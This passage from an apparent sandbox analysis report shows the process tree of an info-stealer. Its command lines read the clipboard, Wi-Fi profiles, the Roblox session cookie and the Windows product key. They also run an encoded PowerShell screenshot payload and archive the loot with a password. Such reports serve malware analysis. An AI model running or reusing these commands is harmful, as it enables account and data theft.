      PID:4476
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      Suspicious use of WriteProcessMemory
      PID:4776
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2956
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      Suspicious use of WriteProcessMemory
      PID:996
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:116
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:5608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4072
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5660
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\15vm2gda\15vm2gda.cmdline"
        6⤵
        
        PID:6032
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA8C3.tmp" "c:\Users\Admin\AppData\Local\Temp\15vm2gda\CSC992E59AAB63442F5BFAC1B9F524875EF.TMP"
        7⤵
        
        PID:2896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5708
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5896
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5984
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6088
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4148
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5320
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5116
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5816
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:3100
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:6116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14242\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\W1tVt.zip" *"
      4⤵
      PID:4872
    - - C:\Users\Admin\AppData\Local\Temp\_MEI14242\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI14242\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\W1tVt.zip" *
        5⤵
        Executes dropped EXE
        
        PID:3040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:5136
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:1072
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:2688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:4100
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:3364
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4532
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5672
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:5756
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5956
- C:\Users\Admin\AppData\Local\Temp\7zO0F2BD5D7\win12.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO0F2BD5D7\win12.exe"
  2⤵
  - Executes dropped EXE
  PID:760
- - C:\Users\Admin\AppData\Local\Temp\7zO0F2BD5D7\win12.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO0F2BD5D7\win12.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffa6f1bcc40,0x7ffa6f1bcc4c,0x7ffa6f1bcc58
  2⤵
  PID:5480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1816,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1812 /prefetch:2
  2⤵
  PID:3052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1992,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2044 /prefetch:3
  2⤵
  PID:3188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2300,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2276 /prefetch:8
  2⤵
  PID:5744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:5912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3304,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:5332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4516 /prefetch:1
  2⤵
  PID:6020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4828,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4844 /prefetch:8
  2⤵
  PID:5124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  PID:1920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  PID:1916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  PID:4696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5208,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5188 /prefetch:8
  2⤵
  PID:1328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5204 /prefetch:8
  2⤵
  PID:2956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5588,i,3499889650034528141,15697026896364001700,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5420 /prefetch:2
  2⤵
  PID:3956

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5156

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:2860
- C:\Program Files\Google\Chrome\Application\chrome.exe
